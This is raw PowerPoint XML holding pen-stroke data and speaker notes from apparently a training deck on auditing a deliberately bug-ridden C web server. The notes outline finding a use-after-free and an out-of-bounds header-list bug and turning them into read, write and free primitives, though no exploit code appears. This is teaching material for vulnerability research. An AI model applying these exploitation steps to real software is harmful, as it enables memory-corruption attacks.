  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 7931 24575,'7'-3'0,"8"-2"0,2-6 0,67-27 0,-25 10 0,37-15 0,6-2 0,-11 0 0,-12 12 0,1-4 0,20-24 0,-48 35 0,28-30 0,-65 42 0,5-6 0,-1-18 0,3 11 0,23-22 0,9-6 0,26-14 0,-19 18 0,5-3 0,2-4 0,-2 5 0,29-13 0,-16 1 0,-2 0 0,-2 5 0,12-28 0,-16-17 0,-23 36 0,12-22 0,9-2 0,-21 21 0,-9-1 0,0-2 0,6-9 0,-13-24 0,-6 27 0,-9-4 0,3 14 0,0-1 0,-1-22 0,11-17 0,-6-7 0,-15 45 0,-1-2 0,0-1 0,-2-2 0,-5-13 0,6-38 0,-7 54 0,0-11 0,0 1 0,0 14 0,6-37 0,-5 7 0,12 20 0,-13 0 0,1 1 0,10 7 0,-9-36 0,19-9 0,-17 42 0,8-1 0,0 3 0,-10 18 0,5-10 0,-7 1 0,0 34 0,0-63 0,-3 71 0,2-31 0,-2 24 0,3 7 0,-6-32 0,1 36 0,-1-36 0,-5-18 0,4 15 0,-2-29 0,1-5 0,1 2 0,0 11 0,-2-6 0,0-4 0,0 4 0,-9-28 0,-4 0 0,1 2 0,8 16 0,-2 31 0,-1-3 0,7 0 0,1 3 0,-17-42 0,12 39 0,0-2 0,-3 1 0,1 5 0,-1-7 0,-14-49 0,18 76 0,-6-13 0,1 10 0,7 21 0,-14-29 0,19 36 0,-13-16 0,6 3 0,-4 8 0,-15-31 0,15 34 0,-12-24 0,2 10 0,7 4 0,-30-42 0,28 44 0,-27-43 0,-6 22 0,19 9 0,-21-6 0,45 35 0,-4-1 0,8 9 0,3-3 0,-2 5 0,3-2 0,-4 3 0,0-3 0,1 2 0,-4-5 0,0 2 0,0 0 0,-8-2 0,9 5 0,-6-3 0,8 4 0,-2 0 0,-1 0 0,-9 0 0,-1 0 0,-5 4 0,-20-3 0,26 5 0,-18-5 0,33 2 0,-6-3 0,4 0 0,-1 0 0,1 0 0,-1 0 0,3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3"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05" units="cm"/>
      <inkml:brushProperty name="height" value="0.05" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1235 86 24575,'-13'-9'0,"2"2"0,-1 0 0,1 1 0,-2 2 0,-15-10 0,11 6 0,-17-7 0,14 7 0,3 4 0,2 0 0,9 4 0,-1 0 0,0 0 0,1 0 0,-1 0 0,-3 0 0,3 0 0,-2 0 0,2 0 0,0 0 0,-2 0 0,-2 0 0,-2 0 0,-5 0 0,-2 0 0,-6 0 0,9 0 0,-1 0 0,11 0 0,-6 0 0,3 0 0,-9 0 0,-1 4 0,-24-3 0,-16 9 0,17-8 0,-1 4 0,37-6 0,-2 0 0,-2 3 0,-7-2 0,-12 7 0,2-6 0,-17 8 0,-21-2 0,29-1 0,-17 1 0,48-8 0,-1 0 0,-2 3 0,-7-3 0,1 6 0,-3-2 0,-20 6 0,21-6 0,-17 2 0,27-3 0,0 4 0,-2 0 0,4 2 0,-6-2 0,6 0 0,-4-1 0,2 1 0,3-1 0,-1 1 0,4 0 0,-5-4 0,5 3 0,-2-2 0,0 2 0,3 1 0,-6 0 0,5-1 0,-5-2 0,5 2 0,-2-3 0,3 4 0,-3-3 0,3 1 0,-3-1 0,3 3 0,0-1 0,-3-2 0,2 2 0,-2-3 0,3 4 0,0 0 0,0-1 0,0 1 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0-1 0,0 1 0,0-3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A23E8D-1792-1541-9147-970A8DD8A355}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5/5/22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55928C-CD14-454C-B617-1AFCF9A58596}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9065622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Toy problems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Some things ONLY make sense in the bigger environment</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{AC55928C-CD14-454C-B617-1AFCF9A58596}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1685700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Source = input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sink = problem code  - calls to system or such</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{AC55928C-CD14-454C-B617-1AFCF9A58596}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="351913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24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1196125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 this for all variables necessary</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{AC55928C-CD14-454C-B617-1AFCF9A58596}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1206908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Do this for all variables necessary</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Other ways: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Concurrency </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Improper mutexes/locking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Confusing functions that look like they return a new pointer but DON’T (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>strtoken</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)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26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1874923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Find ‘free(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>begin_request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)’ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Trace all occurrences of the USE – until no UAF is found</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Show my CODING mistake of freeing ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>begin_request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>’ too early. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Find the ‘free(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>begin_request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)’  in ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cleanup_request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>()’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>USE of this variable within ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>parse_response</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>()’ </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{AC55928C-CD14-454C-B617-1AFCF9A58596}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>27</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1109364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Normally... Trace all of them. I’m giving you a push in the right direction though.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Would eventually get to this with A LOT of time. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Wrote these bugs accidently!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err="1"/>
              <a:t>Res_header_lst</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: List of headers for the response</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Strategy: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Find arrays being iterated over (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>res_header_lst</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Find occurrences and see if this is safe. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{AC55928C-CD14-454C-B617-1AFCF9A58596}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="134822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29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3550001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Cntrl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-F to find all occurrences of this variable being used.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{AC55928C-CD14-454C-B617-1AFCF9A58596}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>30</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="70005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31</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3510840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32</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3011335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sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Trying to emulate a real world situation but guide you in the right direction to speed things up.</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a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="265095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33</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4204821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things up next…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Take time to get through</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{AC55928C-CD14-454C-B617-1AFCF9A58596}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>34</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="430532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ack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>X-Request-Id gets reflected in the response </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="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35</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4124100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- 0x20 or 0x21 headers sent is the MAIN takeaway</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{AC55928C-CD14-454C-B617-1AFCF9A58596}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>37</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3338002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Show what is directly in FRONT of the ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>res_header_lst</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>’ - routes </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Quick proof of concept for the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>write:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>0x1F &amp; 0x20 headers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Quick proof of concept for the read – 0x1F, 0x20 headers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Different code paths cause different things!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Not super viable because of sanity checks in ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>add_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>’ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Free case: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>VERY similar to the write – just FREEING the routes for the exploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Show freeing and such in GDB</a:t>
            </a:r>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38</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2311990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Read in ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>send_response</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>’ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attempts to use POINTERS of type route* as sizes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Write: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Overwrite the pointer to ‘routes’ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Gets freed alongside everything else. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Dangling pointer (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>uaf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) on the route now!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Free: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Free the route (very similar to the ‘write’) </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{AC55928C-CD14-454C-B617-1AFCF9A58596}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>41</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="169398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Routes or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>res_header_lst</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[0x20] is a huge list of pointers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{AC55928C-CD14-454C-B617-1AFCF9A58596}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>42</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1373052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res_header_lst</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[0x20] – leads to a very bad header</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
